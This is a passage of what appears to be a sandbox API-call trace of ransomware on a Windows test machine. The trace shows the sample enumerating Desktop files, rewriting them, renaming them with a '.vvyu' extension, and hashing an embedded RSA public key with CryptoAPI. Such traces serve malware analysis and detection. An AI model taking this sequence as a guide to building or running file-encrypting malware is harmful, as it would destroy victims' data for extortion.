hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2be2220 | out: hHeap=0x6a0000) returned 1 [0183.223] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c03ca0 | out: hHeap=0x6a0000) returned 1 [0183.223] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c446a8 | out: hHeap=0x6a0000) returned 1 [0183.223] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bec8 | out: hHeap=0x6a0000) returned 1 [0183.224] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d36880 | out: hHeap=0x6a0000) returned 1 [0183.224] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d36a98 | out: hHeap=0x6a0000) returned 1 [0183.224] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c31700 | out: hHeap=0x6a0000) returned 1 [0183.224] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37840 | out: hHeap=0x6a0000) returned 1 [0183.224] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e678 | out: hHeap=0x6a0000) returned 1 [0183.224] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378e0 | out: hHeap=0x6a0000) returned 1 [0183.224] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e6c0 | out: hHeap=0x6a0000) returned 1 [0183.224] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c446e8 | out: hHeap=0x6a0000) returned 1 [0183.224] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e648 | out: hHeap=0x6a0000) returned 1 [0183.224] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e5d0 | out: hHeap=0x6a0000) returned 1 [0183.225] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84da8 | out: hHeap=0x6a0000) returned 1 [0183.225] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84d30 | out: hHeap=0x6a0000) returned 1 [0183.225] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6d5c88 | out: hHeap=0x6a0000) returned 1 [0183.225] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e660 | out: hHeap=0x6a0000) returned 1 [0183.225] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d30910 | out: hHeap=0x6a0000) returned 1 [0183.226] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d36670 | out: hHeap=0x6a0000) returned 1 [0183.226] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x74ad40 | out: hHeap=0x6a0000) returned 1 [0183.226] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c828a8 | out: hHeap=0x6a0000) returned 1 [0183.227] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bb80 | out: hHeap=0x6a0000) returned 1 [0183.227] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44748 | out: hHeap=0x6a0000) returned 1 [0183.227] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378c0 | out: hHeap=0x6a0000) returned 1 [0183.227] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44728 | out: hHeap=0x6a0000) returned 1 [0183.227] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bf9c98 | out: hHeap=0x6a0000) returned 1 [0183.227] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2fc98 | out: hHeap=0x6a0000) returned 1 [0183.227] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84b70 | out: hHeap=0x6a0000) returned 1 [0183.228] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4afd0 | out: hHeap=0x6a0000) returned 1 [0183.228] WriteFile (in: hFile=0x584, lpBuffer=0x2d43778*, nNumberOfBytesToWrite=0xfdf2, lpNumberOfBytesWritten=0x30ffb14, lpOverlapped=0x0 | out: lpBuffer=0x2d43778*, lpNumberOfBytesWritten=0x30ffb14*=0xfdf2, lpOverlapped=0x0) returned 1 [0183.229] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d43778 | out: hHeap=0x6a0000) returned 1 [0183.229] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0xfdf7, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0183.229] WriteFile (in: hFile=0x584, lpBuffer=0x2c70bc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x2c70bc8*, lpNumberOfBytesWritten=0x30ffb50*=0x100, lpOverlapped=0x0) returned 1 [0183.230] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70bc8 | out: hHeap=0x6a0000) returned 1 [0183.230] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c6fdf8 [0183.230] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x428) returned 0x2d36670 [0183.230] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2d36670, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0183.230] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x430) returned 0x2d36aa0 [0183.230] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d36670 | out: hHeap=0x6a0000) returned 1 [0183.230] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c6fdf8 | out: hHeap=0x6a0000) returned 1 [0183.230] WriteFile (in: hFile=0x584, lpBuffer=0x2d36aa0*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x2d36aa0*, lpNumberOfBytesWritten=0x30ffb50*=0x28, lpOverlapped=0x0) returned 1 [0183.231] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d36aa0 | out: hHeap=0x6a0000) returned 1 [0183.231] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0183.231] WriteFile (in: hFile=0x584, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x30ffb50*=0x26, lpOverlapped=0x0) returned 1 [0183.231] CloseHandle (hObject=0x584) returned 1 [0183.234] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c6fdf8 [0183.234] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x860) returned 0x2d36670 [0183.234] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c6fdf8 | out: hHeap=0x6a0000) returned 1 [0183.234] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Desktop\\5gGbG59NQgc.flv" (normalized: "c:\\users\\keecfmwgj\\desktop\\5ggbg59nqgc.flv"), lpNewFileName="C:\\Users\\kEecfMwgj\\Desktop\\5gGbG59NQgc.flv.vvyu" (normalized: "c:\\users\\keecfmwgj\\desktop\\5ggbg59nqgc.flv.vvyu")) returned 1 [0183.237] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d36670 | out: hHeap=0x6a0000) returned 1 [0183.237] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c50 | out: hHeap=0x6a0000) returned 1 [0183.238] VirtualFree (lpAddress=0x2040000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0183.241] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c6ff30 | out: hHeap=0x6a0000) returned 1 [0183.241] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x21baeca0, ftCreationTime.dwHighDateTime=0x1d898c4, ftLastAccessTime.dwLowDateTime=0xb05e6450, ftLastAccessTime.dwHighDateTime=0x1d8a13e, ftLastWriteTime.dwLowDateTime=0xb05e6450, ftLastWriteTime.dwHighDateTime=0x1d8a13e, nFileSizeHigh=0x0, nFileSizeLow=0xa0d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="78tFz6xBRVYoOofh5u.avi", cAlternateFileName="78TFZ6~1.AVI")) returned 1 [0183.241] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d30910 [0183.241] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b640 [0183.241] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d30910 | out: hHeap=0x6a0000) returned 1 [0183.242] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Desktop\\78tFz6xBRVYoOofh5u.avi") returned=".avi" [0183.242] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\78tFz6xBRVYoOofh5u.avi" (normalized: "c:\\users\\keecfmwgj\\desktop\\78tfz6xbrvyooofh5u.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x584 [0183.242] GetFileSizeEx (in: hFile=0x584, lpFileSize=0x30ffb40 | out: lpFileSize=0x30ffb40*=2573) returned 1 [0183.242] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2040000 [0183.245] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0x9e7, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0183.245] ReadFile (in: hFile=0x584, lpBuffer=0x2040000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x30ffb78, lpOverlapped=0x0 | out: lpBuffer=0x2040000*, lpNumberOfBytesRead=0x30ffb78*=0x26, lpOverlapped=0x0) returned 1 [0183.246] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84c50 [0183.247] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c50 | out: hHeap=0x6a0000) returned 1 [0183.247] SetFilePointer (in: hFile=0x584, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0183.247] ReadFile (in: hFile=0x584, lpBuffer=0x2040000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x30ffb70, lpOverlapped=0x0 | out: lpBuffer=0x2040000*, lpNumberOfBytesRead=0x30ffb70*=0xa0d, lpOverlapped=0x0) returned 1 [0183.247] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0183.247] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f1) returned 0x2d32688 [0183.247] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0183.247] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0183.247] CryptAcquireContextW (in: phProv=0x30ffa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x30ffa50*=0x6ea700) returned 1 [0183.249] CryptCreateHash (in: hProv=0x6ea700, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x30ffa58 | out: phHash=0x30ffa58) returned 1 [0183.249] CryptHashData (hHash=0x2cbfa50, pbData=0x2d32688, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0183.249] CryptGetHashParam (in: hHash=0x2cbfa50, dwParam=0x2, pbData=0x0, pdwDataLen=0x30ffa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x30ffa54) returned 1 [0183.249] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x11) returned 0x2c44748 [0183.249] CryptGetHashParam (in: hHash=0x2cbfa50, dwParam=0x2, pbData=0x2c44748, pdwDataLen=0x30ffa54, dwFlags=0x0 | out: pbData=0x2c44748, pdwDataLen=0x30ffa54) returned 1 [0183.249] GetLastError () returned 0x0 [0183.249] SetLastError (dwErrCode=0x0) [0183.249] GetLastError () returned 0x0 [0183.249] SetLastError (dwErrCode=0x0) [0183.249] GetLastError () returned 0x0 [0183.249] SetLastError (dwErrCode=0x0) [0183.249] GetLastError () returned 0x0 [0183.249] SetLastError (dwErrCode=0x0) [0183.249] GetLastError () returned 0x0 [0183.249] SetLastError (dwErrCode=0x0) [0183.249] GetLastError () returned 0x0 [0183.249] SetLastError (dwErrCode=0x0) [0183.249] GetLastError () returned 0x0 [0183.249] SetLastError (dwErrCode=0x0) [0183.249] GetLastError () returned 0x0 [0183.250] SetLastError (dwErrCode=0x0) [0183.250] GetLastError () returned 0x0 [0183.250] SetLastError (dwErrCode=0x0) [0183.250] GetLastError () returned 0x0 [0183.250] SetLastError (dwErrCode=0x0) [0183.250] GetLastError () returned 0x0 [0183.250] SetLastError (dwErrCode=0x0) [0183.250] GetLastError () returned 0x0 [0183.250] SetLastError (dwErrCode=0x0) [0183.250] GetLastError () returned 0x0 [0183.250] SetLastError (dwErrCode=0x0) [0183.250] GetLastError () returned 0x0 [0183.250] SetLastError (dwErrCode=0x0) [0183.250] GetLastError () returned 0x0 [0183.250] SetLastError (dwErrCode=0x0) [0183.250] GetLastError () returned 0x0 [0183.250] SetLastError (dwErrCode=0x0) [0183.250] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27ce8 [0183.250] GetLastError () returned 0x0 [0183.250] SetLastError (dwErrCode=0x0) [0183.250] GetLastError () returned 0x0 [0183.250] SetLastError (dwErrCode=0x0) [0183.251] GetLastError () returned 0x0 [0183.251] SetLastError (dwErrCode=0x0) [0183.251] GetLastError () returned 0x0 [0183.251] SetLastError (dwErrCode=0x0) [0183.251] GetLastError () returned 0x0 [0183.251] SetLastError (dwErrCode=0x0) [0183.251] GetLastError () returned 0x0 [0183.251] SetLastError (dwErrCode=0x0) [0183.251] GetLastError () returned 0x0 [0183.251] SetLastError (dwErrCode=0x0) [0183.251] GetLastError () returned 0x0 [0183.251] SetLastError (dwErrCode=0x0) [0183.251] GetLastError () returned 0x0 [0183.251] SetLastError (dwErrCode=0x0) [0183.251] GetLastError () returned 0x0 [0183.251] SetLastError (dwErrCode=0x0) [0183.251] GetLastError () returned 0x0 [0183.251] SetLastError (dwErrCode=0x0) [0183.251] GetLastError () returned 0x0 [0183.251] SetLastError (dwErrCode=0x0) [0183.251] GetLastError () returned 0x0 [0183.251] SetLastError (dwErrCode=0x0) [0183.251] GetLastError () returned 0x0 [0183.251] SetLastError (dwErrCode=0x0) [0183.252] GetLastError () returned 0x0 [0183.252] SetLastError (dwErrCode=0x0) [0183.252] GetLastError () returned 0x0 [0183.252] SetLastError (dwErrCode=0x0) [0183.252] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84c50 [0183.252] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27ce8 | out: hHeap=0x6a0000) returned 1 [0183.252] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44748 | out: hHeap=0x6a0000) returned 1 [0183.252] CryptDestroyHash (hHash=0x2cbfa50) returned 1 [0183.252] CryptReleaseContext (hProv=0x6ea700, dwFlags=0x0) returned 1 [0183.253] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d32688 | out: hHeap=0x6a0000) returned 1 [0183.253] UuidCreate (in: Uuid=0x30ffa48 | out: Uuid=0x30ffa48) returned 0x0 [0183.253] UuidToStringA (in: Uuid=0x30ffa48, StringUuid=0x30ffa40 | out: StringUuid=0x30ffa40) returned 0x0 [0183.253] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84b70 [0183.253] RpcStringFreeA (in: String=0x30ffa40 | out: String=0x30ffa40) returned 0x0 [0183.253] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c50 | out: hHeap=0x6a0000) returned 1 [0183.253] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84c50 [0183.253] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xa10) returned 0x2d36670 [0183.253] SetFilePointer (in: hFile=0x584, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0183.254] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84b70 | out: hHeap=0x6a0000) returned 1 [0183.254] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f0) returned 0x2c4afd0 [0183.254] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84b70 [0183.254] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f0) returned 0x2d2fc98 [0183.254] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x58) returned 0x2bf9c98 [0183.254] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d30910 [0183.254] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4e660 [0183.254] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d308c8 [0183.254] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4e5d0 [0183.254] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4e648 [0183.254] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4e6c0 [0183.254] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4e678 [0183.254] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x2cc0bc0 [0183.254] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x158) returned 0x6d5c88 [0183.254] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x6d5c88, Size=0x218) returned 0x2d37088 [0183.254] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x558) returned 0x2d372a8 [0183.255] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e648 | out: hHeap=0x6a0000) returned 1 [0183.255] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e678 | out: hHeap=0x6a0000) returned 1 [0183.255] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e6c0 | out: hHeap=0x6a0000) returned 1 [0183.255] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2cc0bc0 | out: hHeap=0x6a0000) returned 1 [0183.255] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d372a8 | out: hHeap=0x6a0000) returned 1 [0183.255] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4e6c0 [0183.255] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378c0 [0183.255] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2c4e678 [0183.255] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x18) returned 0x2c44728 [0183.256] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x9) returned 0x2c4e648 [0183.256] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378e0 [0183.256] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10e) returned 0x2c70bc8 [0183.256] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27ce8 [0183.256] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x58) returned 0x2bf9c38 [0183.256] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c44748 [0183.256] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x104) returned 0x2c4bb80 [0183.256] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c446e8 [0183.256] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37840 [0183.256] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70bc8 | out: hHeap=0x6a0000) returned 1 [0183.256] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e678 | out: hHeap=0x6a0000) returned 1 [0183.256] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378e0 | out: hHeap=0x6a0000) returned 1 [0183.256] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e648 | out: hHeap=0x6a0000) returned 1 [0183.257] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44728 | out: hHeap=0x6a0000) returned 1 [0183.257] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378c0 | out: hHeap=0x6a0000) returned 1 [0183.257] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e6c0 | out: hHeap=0x6a0000) returned 1 [0183.257] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27ce8 | out: hHeap=0x6a0000) returned 1 [0183.257] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bf9c98 | out: hHeap=0x6a0000) returned 1 [0183.258] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d37088 | out: hHeap=0x6a0000) returned 1 [0183.258] GetCurrentThreadId () returned 0x264 [0183.258] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2c70bc8 [0183.258] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x82) returned 0x6cdf90 [0183.258] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x2c) returned 0x2c84d30 [0183.258] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea700 [0183.258] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x148) returned 0x2c84da8 [0183.258] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378c0 [0183.258] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378e0 [0183.258] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x6d5c88 [0183.258] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0183.258] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0183.259] GetCurrentThreadId () returned 0x264 [0183.259] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0183.259] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0183.259] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xeb) returned 0x2be2220 [0183.259] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0183.259] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0183.259] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0183.260] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0183.260] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2be2220 | out: hHeap=0x6a0000) returned 1 [0183.260] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2be2220 [0183.260] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378c0 | out: hHeap=0x6a0000) returned 1 [0183.260] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4c) returned 0x2c828a8 [0183.260] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378c0 [0183.260] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x74ad40 [0183.260] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37830 [0183.260] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4e6c0 [0183.260] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37830 | out: hHeap=0x6a0000) returned 1 [0183.260] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37830 [0183.261] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378a0 [0183.261] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378b0 [0183.261] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37890 [0183.261] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37850 [0183.261] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37870 [0183.261] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378d0 [0183.261] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4e648 [0183.261] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378a0 | out: hHeap=0x6a0000) returned 1 [0183.261] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378a0 [0183.261] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, 